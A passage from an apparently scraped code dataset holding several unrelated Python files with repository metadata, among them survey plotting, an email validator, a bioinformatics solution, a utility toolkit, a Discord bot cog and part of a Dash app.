self.fifo_list.append(item)\n if len(self.fifo_list) > 10:\n self.fifo_list.pop(0)\n def past(self):\n return print(self.fifo_list.pop(0))\nstart_time = timer()\nw = SimplePop()\nw.inserts('1')\nw.inserts('2')\nw.inserts('3')\nend_time = timer()\nprint(end_time - start_time)\nprint(w.fifo_list)\nw.past()\nprint(w.fifo_list)\nprint()\nclass SimplePopTwo:\n fifo_list = []\n def inserts(self, item):\n self.fifo_list.append(item)\n if len(self.fifo_list) > 10:\n self.fifo_list.reverse()\n self.fifo_list.pop()\n self.fifo_list.reverse()\n def past(self):\n self.fifo_list.reverse()\n r = self.fifo_list.pop()\n self.fifo_list.reverse()\n return print(r)\nstart_time = timer()\ns = SimplePopTwo()\ns.inserts('1')\nfor i in range(15):\n s.inserts(i)\nend_time = timer()\nprint(end_time - start_time)\nprint(s.fifo_list)\ns.past()\nprint(s.fifo_list)","repo_name":"ravshansher23/Lesta-Studio","sub_path":"Lesta Studio/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29553665392","text":"import numpy as np # type: ignore\nimport matplotlib.pyplot as plt # type: ignore\nimport argparse\nimport json\nimport copy\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--data-file\", type=str, default=\"out/survey_results.json\",\n help=\"location of JSON file containing survey results\")\n\nargs = parser.parse_args()\n\nwith open(args.data_file, \"r\") as f:\n survey_j = json.load(f)\n\nmodel_j = survey_j[\"by_model\"]\nsample_j = survey_j[\"by_sample\"]\nxp_counts = survey_j[\"xp_counts\"]\n\nxp_idxs = np.arange(4)\n\ndef standard_error(npa):\n return np.std(npa, ddof=1) / np.sqrt(np.size(npa))\n\ndef ninetyfive_confidence(npa):\n return standard_error(npa) * 1.96\n\ndef coherency_stats(breakdown):\n points = [0.0] * breakdown[0] + [0.5] * breakdown[1] + [1.0] * breakdown[2]\n cdat = np.array(points)\n mean = np.mean(cdat)\n err = standard_error(cdat)\n return mean, err\n\ndef weighted_stats(human_confidences, comp_confidences):\n points = []\n for idx,amt in enumerate([0.0,0.25,0.5,0.75,1.0]):\n points += [amt]*human_confidences[idx]\n points += [-amt]*comp_confidences[idx]\n wdat = np.array(points)\n mean = np.mean(wdat)\n err = standard_error(wdat)\n return mean,err\n\ndef human_stats(comp_count, human_count):\n points = [-1.0] * comp_count + [1.0] * human_count\n hdat = np.array(points)\n mean = np.mean(hdat)\n err = standard_error(hdat)\n return mean, err\n\nclass BarSet():\n def __init__(self):\n self.means = []\n self.errors = []\n\n def add_point(self, mean, error):\n self.means.append(mean)\n self.errors.append(error)\n\nmodel_proto = {\n \"coherency\" : BarSet(),\n \"human\" : BarSet(),\n \"weighted\" : BarSet()\n}\n\nper_model = {\n \"MVS\" : copy.deepcopy(model_proto),\n \"RNN\" : copy.deepcopy(model_proto),\n \"Bach\" : copy.deepcopy(model_proto)\n}\n\nmodel_names = [\"MVS\", \"RNN\", \"Bach\"]\n\nnum_xps = 4\n\nfor model in model_names:\n total_coherencies = np.array([0]*3)\n total_hvals = np.array([0,0])\n total_human_confs = np.array([0]*5)\n total_comp_confs = np.array([0]*5)\n\n model_dat = per_model[model]\n\n for xp in range(4):\n counts = model_j[model][xp]\n coherency_counts = counts[\"coherency_breakdown\"]\n model_dat[\"coherency\"].add_point(*coherency_stats(coherency_counts))\n\n hcounts = [counts[\"comp_count\"], counts[\"human_count\"]]\n model_dat[\"human\"].add_point(*human_stats(*hcounts))\n\n confidences = [counts[\"human_confidences\"], counts[\"comp_confidences\"]]\n model_dat[\"weighted\"].add_point(*weighted_stats(*confidences))\n\n total_coherencies += np.array(coherency_counts)\n total_hvals += np.array(hcounts)\n total_human_confs += np.array(confidences[0])\n total_comp_confs += np.array(confidences[1])\n\n model_dat[\"coherency\"].add_point(*coherency_stats(total_coherencies))\n model_dat[\"human\"].add_point(*human_stats(*total_hvals))\n model_dat[\"weighted\"].add_point(*weighted_stats(total_human_confs,\n total_comp_confs))\n\nidxs = np.arange(num_xps+1)\nwidth = 0.2\nthe_capsize = 4\n\nxp_labels = [\"Novice\", \"Intermediate\", \"Advanced\", \"Expert\", \"Overall\"]\nmodel_colours = ['g','b','r']\n\n# coherency plot\nplt.figure(1)\nplt.title(\"Mean coherency rating by model and experience\")\n\nmodel_bars = []\nfor idx,model in enumerate(model_names):\n cdat = per_model[model][\"coherency\"]\n bars = plt.bar(idxs + width*idx, cdat.means, width, color=model_colours[idx],\n yerr=cdat.errors, capsize=the_capsize)\n model_bars.append(bars[0])\n\nplt.legend(model_bars, model_names)\nplt.xlabel(\"Experience\")\nplt.ylabel(\"Coherency\")\nplt.xticks(idxs, xp_labels)\nax = plt.gca()\nax.set_ylim([0.0,1.0])\n\n# turing-test plot\nplt.figure(2)\nplt.title(\"Mean human classification rate by model and experience\")\n\nmodel_bars = []\nfor idx,model in enumerate(model_names):\n hdat = per_model[model][\"human\"]\n bars = plt.bar(idxs + width*idx, hdat.means, width, color=model_colours[idx],\n yerr=hdat.errors, capsize=the_capsize)\n model_bars.append(bars[0])\n\nplt.legend(model_bars, model_names)\nplt.xlabel(\"Experience\")\nplt.ylabel(\"Human/computer classification (±1)\")\nplt.xticks(idxs, xp_labels)\nplt.axhline(y=0, color='k') # show y=0\n\n# weighted turing-test plot\nplt.figure(3)\nplt.title(\"Mean confidence-weighted classification by model and experience\")\n\nmodel_bars = []\nfor idx,model in enumerate(model_names):\n wdat = per_model[model][\"weighted\"]\n bars = plt.bar(idxs + width*idx, wdat.means, width, color=model_colours[idx],\n yerr=wdat.errors, capsize=the_capsize)\n model_bars.append(bars[0])\n\nplt.legend(model_bars, model_names)\nplt.xlabel(\"Experience\")\nplt.ylabel(\"Weighted human/computer classification (±1)\")\nplt.xticks(idxs, xp_labels)\nplt.axhline(y=0, color='k')\nax = plt.gca()\nax.set_ylim([-0.45,0.7])\n\n# show response/experiecne distribution\nplt.figure(4)\nplt.title(\"Distribution of survey responses by experience\")\nplt.xlabel(\"Experience\")\nplt.ylabel(\"Responses\")\nplt.bar(idxs[0:4], xp_counts, width*2, color='b')\nplt.xticks(idxs[0:4], xp_labels[0:4])\nplt.show()\n\n","repo_name":"alexcoplan/p2proj","sub_path":"src/script/human_plots.py","file_name":"human_plots.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17021213720","text":"import re\n\n\ndef email_validate():\n with open('emails.txt', 'r') as file:\n new = file.readlines()\n for each in new:\n # print(each, end='')\n regex = re.fullmatch(r'^[a-zA-Z]\\w+@(gmail|hotmail|yahoo)\\.com', each[:-1])\n if regex is None:\n print(f\"{each} is invalid mail\")\n with open('invalid_mail.txt', 'a') as file1:\n file1.write(each)\n\n else:\n print(f'{each} is valid')\n with open('valid_mail.txt', 'a') as file1:\n file1.write(each)\n\n\n # if pattern is None:\n # with open('')\n\n\nemail_validate()\n","repo_name":"jisshub/python-django-training","sub_path":"code-snippets/email_validation_storing_to_file.py","file_name":"email_validation_storing_to_file.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10981609582","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE\n\nimport argparse\nimport sys\n\nif sys.version_info < (3, 9):\n import importlib_resources\nelse:\n import importlib.resources as importlib_resources\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser(\n description=\"Print out compilation arguments to use Awkward Array as a C++ dependency\"\n )\n argparser.add_argument(\n \"--cflags\",\n action=\"store_true\",\n help=\"output compiler flags and Awkward include path\",\n )\n argparser.add_argument(\n \"--cflags-only-I\", action=\"store_true\", help=\"output Awkward include path\"\n )\n argparser.add_argument(\n \"--incdir\", action=\"store_true\", help=\"output Awkward include directory name\"\n )\n\n # only used in validating the arguments\n args = argparser.parse_args()\n\n output = []\n incdir_ref = importlib_resources.files(\"awkward\") / \"src\" / \"cpp-headers\"\n with importlib_resources.as_file(incdir_ref) as incdir:\n # loop over original sys.argv to get optional arguments in order\n for arg in sys.argv:\n if arg == \"--cflags\":\n output.append(f\"-std=c++17 -I{incdir}\")\n\n if arg == \"--cflags-only-I\":\n output.append(f\"-I{incdir}\")\n\n if arg == \"--incdir\":\n output.append(str(incdir))\n\n print(\" \".join(output)) # noqa: T201\n","repo_name":"Laurits7/awkward","sub_path":"src/awkward/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"14832963279","text":"from __future__ import annotations\n\nfrom typing import Dict\n\nfrom torch import _C\n\n\nclass ExportTypes:\n r\"\"\"Specifies how the ONNX model is stored.\"\"\"\n\n PROTOBUF_FILE = \"Saves model in the specified protobuf file.\"\n ZIP_ARCHIVE = \"Saves model in the specified ZIP file (uncompressed).\"\n COMPRESSED_ZIP_ARCHIVE = \"Saves model in the specified ZIP file (compressed).\"\n DIRECTORY = \"Saves model in the specified folder.\"\n\n\nclass SymbolicContext:\n \"\"\"Extra context for symbolic functions.\n\n Args:\n params_dict (Dict[str, _C.IValue]): Mapping from graph initializer name to IValue.\n env (Dict[_C.Value, _C.Value]): Mapping from Torch domain graph Value to ONNX domain graph Value.\n cur_node (_C.Node): Current node being converted to ONNX domain.\n onnx_block (_C.Block): Current ONNX block that converted nodes are being appended to.\n \"\"\"\n\n def __init__(\n self,\n params_dict: Dict[str, _C.IValue],\n env: dict,\n cur_node: _C.Node,\n onnx_block: _C.Block,\n ):\n self.params_dict: Dict[str, _C.IValue] = params_dict\n self.env: Dict[_C.Value, _C.Value] = env\n # Current node that is being converted.\n self.cur_node: _C.Node = cur_node\n # Current onnx block that converted nodes are being appended to.\n self.onnx_block: _C.Block = onnx_block\n","repo_name":"pytorch/pytorch","sub_path":"torch/onnx/_exporter_states.py","file_name":"_exporter_states.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"34742064663","text":"from Bio import SeqIO\ncTable = {'A':'T','G':'C','C':'G','T':'A'}\n\ndef getReverseComplement(kmer):\n\trc = \"\"\n\tfor c in kmer[::-1]:\n\t\trc += cTable[c]\n\n\treturn rc\n\ndef getHammingDistance(s1, s2):\n\tdiff = 0\n\tfor c1,c2 in zip(s1,s2):\n\t\tif c1 != c2:\n\t\t\tdiff += 1\n\n\treturn diff\n\ndef getCorrectSequence(seq, correct_reads):\n\tfor cseq in correct_reads:\n\t\tdist = getHammingDistance(seq, cseq)\n\t\tif dist == 1:\n\t\t\treturn cseq\n\n\ninput_file = open(\"rosalind_corr.txt\",'r')\t\t\nsequences = SeqIO.parse(input_file,'fasta')\nreads = []\nfor fasta_seq in sequences:\n\treads.append(str(fasta_seq.seq))\n\ncorrect_seq = set()\nincorrect_seq = set()\nfor read in reads:\n\tif reads.count(read) > 1:\n\t\tcorrect_seq.add(read)\n\telse:\n\t\treverse = getReverseComplement(read)\n\t\tif reads.count(reverse) > 0:\n\t\t\tcorrect_seq.add(read)\n\t\telse:\n\t\t\tincorrect_seq.add(read)\n\ncorrect_seq_rc = set()\nfor seq in correct_seq:\n\tcorrect_seq_rc.add(getReverseComplement(seq))\n\ncorrect_seq.update(correct_seq_rc)\n\nfor seq in incorrect_seq:\n\tcorrect = getCorrectSequence(seq, correct_seq)\n\tprint(seq+\"->\"+correct)\n\t","repo_name":"raomanus/rosalind","sub_path":"corr.py","file_name":"corr.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13532931919","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nimport csv\n\nfrom util.const import TEMP_DIR, IDNET_BASE_FOLDER, ZJU_BASE_FOLDER, TIME_CONV\n\n\nfreq_all = {}\n\n\n# create a csv with basic statistics of IDNet dataset\ndef IDNet_statistics(path, filename):\n csv_file = open(TEMP_DIR+'/'+filename, mode='w')\n csv_file.write('file, numsamples, mean_dt, std_dt, fs, total_time (min)\\n')\n dataset_total_time = 0\n \n users_file = open(TEMP_DIR+'/'+'idnet_users.csv', mode='w')\n users_file.write('user, time\\n')\n fs_list = []\n users = {}\n ax_min = 1000\n ax_max = -100\n ay_min = 1000\n ay_max = -100\n az_min = 1000\n az_max = -100\n \n for file in os.listdir(path):\n current = os.path.join(path, file)\n if os.path.isdir(current):\n filename = current+'/'+file +'_accelerometer.log'\n df = pd.read_csv(filename, delimiter='\\t')\n \n x = df['accelerometer_x_data']\n min_value = min(x)\n if( min_value < ax_min ):\n ax_min = min_value\n max_value = max(x)\n if( max_value > ax_max ):\n ax_max = max_value\n\n\n y = df['accelerometer_y_data']\n min_value = min(y)\n if( min_value < ay_min ):\n ay_min = min_value\n max_value = max(y)\n if( max_value > ay_max ):\n ay_max = max_value\n \n z = df['accelerometer_z_data'] \n min_value = min(z)\n if( min_value < az_min ):\n az_min = min_value\n max_value = max(z)\n if( max_value > az_max ):\n az_max = max_value\n\n t = df['accelerometer_timestamp']\t\n dt= np.diff(t)\n mean_t = np.mean(dt)\n std_t = np.std(dt)\n #accelerometer_x_data\taccelerometer_y_data\taccelerometer_z_data\n linecounter = df.shape[0] \n fs = 1 / (mean_t/ TIME_CONV )\n fs_list.append(fs)\n total_time = (t[t.size-1] - t[ 0 ]) /(60 * TIME_CONV) \n dataset_total_time = dataset_total_time + total_time\n line = file+', '+str(linecounter)+', '+str(mean_t)+', '+str(std_t)+', '+str(fs)+', '+str(total_time)\n print(line)\n csv_file.write(line+\"\\n\")\n username = file[0:4]\n time = users.get(username)\n if time == None:\n users[username] = total_time\n else:\n users[username] = time + total_time\n\n\n csv_file.close()\n print('Sampling rate - MIN: '+ str(np.min(fs_list))+' MAX: '+ str(np.max(fs_list)) +' MEAN: '+str(np.mean(fs_list))+' STD: '+ str(np.std(fs_list)))\n print('IDNet total time: '+ str(dataset_total_time/60)+' hours')\n \n for (key, value) in users.items() :\n users_file.write(key + \", \" + str(value)+'\\n' )\n users_file.close()\n print(\"ax_min: \"+str(ax_min)+\" ax_max: \"+str(ax_max))\n print(\"ay_min: \"+str(ay_min)+\" ay_max: \"+str(ay_max))\n print(\"az_min: \"+str(az_min)+\" az_max: \"+str(az_max))\n \n\n\n# create a csv with basic statistics of ZJU-GaiAcc dataset\n# you have to run for a given session\ndef ZJU_session_statistics(basepath, sessiondir, numusers, output_file):\n # frequencies of cycle lengths\n freq = {}\n max_global = 0\n csv_file = open(TEMP_DIR+'/'+output_file, mode='w')\n csv_file.write('file, total_time (min)\\n')\n path = basepath + '/' + sessiondir\n print(path)\n session_time = 0\n for file in os.listdir(path):\n current = os.path.join(path, file)\n if os.path.isdir(current):\n user_time = 0\n for i in range(1,7):\n filename = current+'/rec_'+str(i)+'/cycles.txt'\n df = pd.read_csv(filename, header = None, delimiter=',')\n data = df.values\n n = data[-1].shape[0]\n x = data[ -1]\n dx = np.diff(x)\n max_recording = max(dx)\n if max_recording > max_global:\n max_global = max_recording\n for item in dx: \n if (item in freq): \n freq[item] += 1\n else: \n freq[item] = 1\n total_time = x[n-1]\n user_time = user_time + total_time/6000\n line = file + ', ' + str(user_time)\n csv_file.write(line+\"\\n\")\n session_time = session_time + user_time\n csv_file.close()\n print(sessiondir + ': ' + str(session_time)+' minutes')\n print(\"Max samples/cycle: \" + str(max_global))\n plot_histogram( freq, sessiondir )\n freq_all.update( freq )\n return session_time\n\n\ndef plot_histogram( freq, sessiondir ):\n plt.bar(list(freq.keys()), freq.values(), color='g')\n plt.xlabel('Cycle length')\n plt.ylabel('Frequency')\n plt.title('Histogram of cycle lengths '+sessiondir)\n\n k = np.array(list(freq.keys()))\n v = np.array(list(freq.values()))\n\n # Iterating over values \n sum_less = 0\n sum_all = 0\n for cycle, cycle_length in freq.items(): \n sum_all = sum_all + cycle_length\n if( cycle > 128 ):\n print(cycle, \":\", cycle_length)\n sum_less = sum_less + cycle_length \n print(str(sum_less) + \" / \" + str(sum_all))\n avg_cycle_length = np.dot(k, v)/np.sum(v)\n print(\"Average cycle length: \"+str(avg_cycle_length))\n print(\"Median cycle length: \"+str(np.median(k)))\n plt.grid(True)\n plt.show()\n\n\ndef main_statistics():\n # path = IDNET_BASE_FOLDER\n # print(path)\n # IDNet_statistics(path, 'idnet_statistics.csv')\n\n \n path = ZJU_BASE_FOLDER\n t0 = ZJU_session_statistics(path, 'session_0', 22, 'zju_session0.csv')\n t1 = ZJU_session_statistics(path, 'session_1', 153, 'zju_session1.csv')\n t2 = ZJU_session_statistics(path, 'session_2', 153, 'zju_session2.csv')\n print('Total time: '+ str((t0+t1+t2)/60)+' hours')\n\n plot_histogram( freq_all, \" - ZJUGaitAccel\" )\n\n\n\n\n\n ","repo_name":"margitantal68/featuregait","sub_path":"util/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":6040,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"16216185484","text":"# -*- coding: utf-8 -*-\n##################################################################\n# By Kyan\n##################################################################\nimport os\nimport sys\nimport time\nimport getpass\nimport subprocess\nimport shlex\nimport urllib.request\nimport hashlib\nimport json\nimport io\nimport consoleiotools as cit\nfrom functools import wraps\n\n\nclass KyanToolKit(object):\n @property\n def version(self):\n return '5.1.2'\n\n def __init__(self, trace_file=\"trace.xml\"):\n self.trace_file = trace_file\n\n def __del__(self):\n pass\n\n# -Decorators-----------------------------------------------------\n def inTrace(self, func: callable): # decorator\n \"\"\"将被修饰函数的进入和退出写入日志\"\"\"\n @wraps(func)\n def call(*args, **kwargs):\n self.TRACE(\"Enter \" + func.__qualname__ + \"()\")\n result = func(*args, **kwargs)\n self.TRACE(\"Leave \" + func.__qualname__ + \"()\")\n return result\n return call\n\n# -Text Process---------------------------------------------------\n @classmethod\n def banner(cls, content_=\"Well Come\"):\n '生成占3行的字符串'\n # char def\n sp_char = \"#\"\n # length calc\n itsays = content_.strip()\n effective_length = int(len(itsays))\n # gen contents\n side_space = ' ' * int(effective_length * ((1 - 0.618) / 0.618) / 2)\n content_line = sp_char + side_space + itsays + side_space + sp_char\n content_line_length = len(content_line)\n banner_border = sp_char * content_line_length\n return banner_border + '\\n' + content_line + '\\n' + banner_border\n\n @classmethod\n def md5(cls, words=\"\"):\n if type(words) != bytes: # md5的输入必须为bytes类型\n words = str(words).encode()\n return hashlib.md5(words).hexdigest()\n\n# -Image Process--------------------------------------------------\n @staticmethod\n def imageToColor(url: str, scale=200, mode='rgb'):\n '将 url 指向的图片提纯为一个颜色'\n from PIL import Image\n import colorsys\n if url:\n response = urllib.request.urlopen(url)\n img_buffer = io.BytesIO(response.read())\n img = Image.open(img_buffer)\n img = img.convert('RGBA')\n img.thumbnail((scale, scale))\n statistics = {'r': 0, 'g': 0, 'b': 0, 'coef': 0}\n for cnt, (r, g, b, a) in img.getcolors(img.size[0] * img.size[1]):\n hsv = colorsys.rgb_to_hsv(r / 255, g / 255, b / 255)\n saturation = hsv[1] * 255\n coefficient = (saturation * cnt * a) + 0.01 # 避免出现 0\n statistics['r'] += coefficient * r\n statistics['g'] += coefficient * g\n statistics['b'] += coefficient * b\n statistics['coef'] += coefficient\n color = (\n int(statistics['r'] / statistics['coef']),\n int(statistics['g'] / statistics['coef']),\n int(statistics['b'] / statistics['coef'])\n )\n if mode.lower() == 'rgb':\n return color\n elif mode.lower() == 'hex':\n return \"#%0.2X%0.2X%0.2X\" % color\n else:\n return color\n else:\n return False\n\n# -System Fucntions-----------------------------------------------\n @classmethod\n def clearScreen(cls):\n \"\"\"清屏\"\"\"\n if \"win32\" in sys.platform:\n os.system('cls')\n elif \"linux\" in sys.platform:\n os.system('clear')\n elif 'darwin' in sys.platform:\n os.system('clear')\n else:\n cit.err(\"No clearScreen for \" + sys.platform)\n\n @classmethod\n @cit.as_session('Run Command')\n def runCmd(cls, cmd):\n \"\"\"run command and show if success or failed\n\n Args:\n cmd: string\n Returns:\n bool: if this command run successfully\n \"\"\"\n cit.echo(cmd, \"command\")\n result = os.system(cmd)\n cls.checkResult(result)\n\n @classmethod\n @cit.as_session('Read Command')\n def readCmd(cls, cmd):\n \"\"\"run command and return the str format stdout\n\n Args:\n cmd: string\n Returns:\n str: what the command's echo\n \"\"\"\n args = shlex.split(cmd)\n proc = subprocess.Popen(args, stdout=subprocess.PIPE)\n (proc_stdout, proc_stderr) = proc.communicate(input=None) # proc_stdin\n return proc_stdout.decode() # stdout & stderr is in bytes format\n\n# -Get Information------------------------------------------------\n @classmethod\n def ajax(cls, url, param={}, method='get'):\n \"\"\"Get info by ajax\n\n Args:\n url: string\n Returns:\n dict: json decoded into a dict\n \"\"\"\n param = urllib.parse.urlencode(param)\n if method.lower() == 'get':\n req = urllib.request.Request(url + '?' + param)\n elif method.lower() == 'post':\n param = param.encode('utf-8')\n req = urllib.request.Request(url, data=param)\n else:\n raise Exception(\"invalid method '{}' (GET/POST)\".format(method))\n rsp = urllib.request.urlopen(req)\n if rsp:\n rsp_json = rsp.read().decode('utf-8')\n rsp_dict = json.loads(rsp_json)\n return rsp_dict\n return None\n\n @classmethod\n def readFile(cls, filepath):\n for mode in (\"utf-8\", 'gbk', 'cp1252', 'windows-1252', 'latin-1'):\n try:\n with open(filepath, mode='r', encoding=mode) as f:\n content = f.read()\n cit.info('以 {} 格式打开文件'.format(mode))\n return content\n except UnicodeDecodeError:\n cit.warn('打开文件:尝试 {} 格式失败'.format(mode))\n return None\n\n\n# -Pre-checks---------------------------------------------------\n @classmethod\n @cit.as_session(\"Platform Check\")\n def needPlatform(cls, expect_platform: str):\n cit.info(\"Need: \" + expect_platform)\n cit.info(\"Current: \" + sys.platform)\n if expect_platform not in sys.platform:\n cit.bye(\"Platform Check Failed\")\n\n @classmethod\n @cit.as_session(\"User Check\")\n def needUser(cls, expect_user: str):\n cit.info(\"Need: \" + expect_user)\n cit.info(\"Current: \" + cls.getUser())\n if cls.getUser() != expect_user:\n cit.bye(\"User Check Failed\")\n\n# -Debug---------------------------------------------------------\n def TRACE(self, input_: str, trace_type='INFO'):\n trace_content = ''.join(input_)\n current_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n current_function = sys._getframe().f_back\n current_function_name = current_function.f_code.co_name\n current_line = current_function.f_code.co_firstlineno\n current_filename = current_function.f_code.co_filename\n trace_header = '\\n<{type} FILE=\"{file}\" LINE=\"{line}\" TIME=\"{time}\" FUNC=\"{func}()\">\\n'.format(\n type=trace_type, file=current_filename, line=str(current_line),\n time=current_time, func=current_function_name\n )\n with open(self.trace_file, 'a') as trace:\n trace.write(trace_header + trace_content + \"\\n\\n\")\n\n\n# -Internal Uses-------------------------------------------------\n @classmethod\n def checkResult(cls, result: bool):\n if 0 == result:\n cit.echo(\"Done\", \"result\")\n else:\n cit.echo(\"Failed\", \"result\")\n\n @classmethod\n def getUser(cls):\n return getpass.getuser()\n","repo_name":"Python3pkg/PyKyanToolKit","sub_path":"KyanToolKit.py","file_name":"KyanToolKit.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10217143772","text":"from discord.ext import commands\nfrom datetime import datetime\nimport discord\n\nclass PEvents(commands.Cog):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.command(name=\"pevent\", description = 'Displays upcoming Pokemon Masters events')\n async def pevent(self, ctx: commands.Context):\n # Get current time as yyyy-mm-dd hh:mm:ss UTC\n now = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S UTC')\n\n # Open rumors.txt and read it into a list\n with open('rumors.txt', 'r', encoding='utf-8') as f:\n rumors = f.readlines()\n\n # Remove newline characters in rumors\n for i in range(len(rumors)):\n rumors[i] = rumors[i].strip()\n\n embed = discord.Embed(title=\"Upcoming Pokemon Masters Events:\", color=0xFF0000, timestamp=datetime.utcnow())\n embed.set_author(name = '')\n\n # If index % 5 == 2, check if the event is in the future. If not, add it to the embed.\n count = 0\n for i in range(len(rumors)):\n if i % 5 == 2:\n if now < rumors[i]:\n # Do not add if contains scout or Scout\n if 'scout' not in rumors[i-2] and 'Scout' not in rumors[i-2]:\n # Get time difference between now and the event\n time_diff = datetime.strptime(rumors[i], '%Y-%m-%d %H:%M:%S UTC') - datetime.strptime(now, '%Y-%m-%d %H:%M:%S UTC')\n embed.add_field(name=rumors[i-2], value='Starting: ' + rumors[i] + '\\nIn: ' + str(time_diff))\n count += 1\n\n # If no events are found, add a message to the embed\n if count == 0:\n embed.add_field(name=\"No upcoming events found\", value=\"Check https://github.com/pm-events/pm-events.github.io/ if there are any new leaks\")\n\n await ctx.send(embed=embed)\n\ndef setup(bot: commands.Bot):\n bot.add_cog(PEvents(bot))","repo_name":"tonycai777/DiscordBot","sub_path":"pevents.py","file_name":"pevents.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19520043306","text":"\nfrom imp import reload\nimport dash_bootstrap_components as dbc\nfrom dash import html\nfrom dash import dcc\n\nfrom dash.dependencies import Input, Output, State\nimport re\nimport dash\nimport pandas as pd\nfrom dash.exceptions import PreventUpdate\nimport numpy as np\nimport graphviz\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport string\nimport base64\nfrom dash import dash_table\nimport io\nimport time\n\nfrom sqlalchemy import column\nfrom anytree import Node,AnyNode\nfrom anytree.exporter import UniqueDotExporter\nfrom anytree.exporter import DotExporter\nimport pydot\n\n(graph,) = pydot.graph_from_dot_file('somefile.dot')\ngraph.write_png('somefile.png')\n# import cx_Oracle\n# from sqlalchemy import types, create_engine\n\napp = dash.Dash(suppress_callback_exceptions=True,external_stylesheets=[dbc.themes.CERULEAN])\n\nSIDEBAR_HIDEN = {\n \"position\": \"fixed\",\n \"top\": 62.5,\n \"left\": 0,\n \"bottom\": 0,\n \"width\": \"18rem\",\n \"padding\": \"2rem 1rem\",\n \"background-color\": \"#e8e9eb\",\n \"overflowY\": \"scroll\",\n \"height\": \"89%\",\n \"overflow-x\": \"hidden\",\n \"transition\": \"all 0.5s\"\n \n}\n\n# SIDEBAR_STYLE = {\n# \"position\": \"fixed\",\n# \"top\": 62.5,\n# \"left\": \"-18rem\",\n# \"bottom\": 0,\n# \"width\": \"18rem\",\n# \"height\": \"89%\",\n# \"z-index\": 1,\n# \"overflow-x\": \"hidden\",\n# \"transition\": \"all 0.5s\",\n# \"padding\": \"0rem 0rem\",\n# \"background-color\": \"#f8f9fa\",\n# }\nSIDEBAR_STYLE = {\n \"position\": \"fixed\",\n \"top\": 0,\n \"left\": 0,\n \"bottom\": 0,\n \"width\": \"17rem\",\n \"padding\": \"4rem 1rem\",\n \"background-color\": \"#d7d8db\",\n \"overflowY\": \"scroll\",\n}\n# the styles for the main content position it to the right of the sidebar and\n# add some padding.\nCONTENT_STYLE1 = {\n \"margin-top\":\"3rem\",\n \"margin-left\": \"11rem\",\n \"margin-right\": \"1rem\",\n \"padding\": \"2rem 1rem\",\n}\n\nCONTENT_STYLE = {\n \"margin-left\": \"18rem\",\n \"margin-right\": \"2rem\",\n \"padding\": \"2rem 2rem\",\n}\n\n\nBUTTON_HIDEN = {\n \"margin-top\":\"3rem\",\n \"margin-left\":\"11rem\"\n }\n\nBUTTON_STYLE = {\n \"margin-top\":\"3rem\",\n }\nconfig = {'modeBarButtonsToRemove': ['toggleSpikelines','hoverCompareCartesian','zoom2d','zoomIn2d',\n 'zoomOut2d','resetScale2d','autoScale2d','select2d','pan2d','lasso2d'],\n 'displaylogo': False\n}\nsidebar = html.Div(\n [\n html.H4(\"Data Analysis\", className=\"display-15\"),\n html.Hr(),\n dbc.Nav(\n [ \n dcc.Upload([\n 'Drag and Drop or ',\n html.A('Select a File')\n ], style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center'\n },id='upload'),html.Br(),\n dbc.Collapse(\n dbc.Card(dbc.CardBody([\n dbc.Collapse(dcc.Dropdown(\n value=[], \n id=\"radioitems\"\n ),id='sheet_values',is_open=False),\n html.Br(), \n dbc.Collapse(html.Div(\n dbc.Card(dbc.CardBody([ html.H4('Select Columns'),\n dbc.Checklist(\n id=\"columns\",\n value=[])]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"150px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\"},\n className=\"no-scrollbars\"),\n id='columns_collapse',is_open=False\n ), \n html.Br(), \n dbc.Collapse(html.Div(\n dbc.Card(dbc.CardBody([ html.H4('Select Filters'),\n dbc.Checklist(\n id=\"Filters\",\n value=[])]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"150px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\"},\n className=\"no-scrollbars\"),\n id='Filters_collapse',is_open=False\n )]),outline=True, color=\"dark\"),id='card_collapse',is_open=False), \n \n html.Br(),\n \n html.Button(\n \"Apply Filters\",\n id=\"y_collapse-button\",\n className=\"mr-1\",\n # color=\"primary\",\n n_clicks=0,\n style={'background-color': '#38ACEC',\n 'border': 'none',\n 'color': 'white',\n 'padding': '10px 32px',\n 'text-align': 'center',\n 'text-decoration': 'none',\n 'display': 'inline-block',\n 'font-size': '16px',\n 'border-radius': '4px'}\n ),\n html.Br(),\n dbc.Collapse(\n 